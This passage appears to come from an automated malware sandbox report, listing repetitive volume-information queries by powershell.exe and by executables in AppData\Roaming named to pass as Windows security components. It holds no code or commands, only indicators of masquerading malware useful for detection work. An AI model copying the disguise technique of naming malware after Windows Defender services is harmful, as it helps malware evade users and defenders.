                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
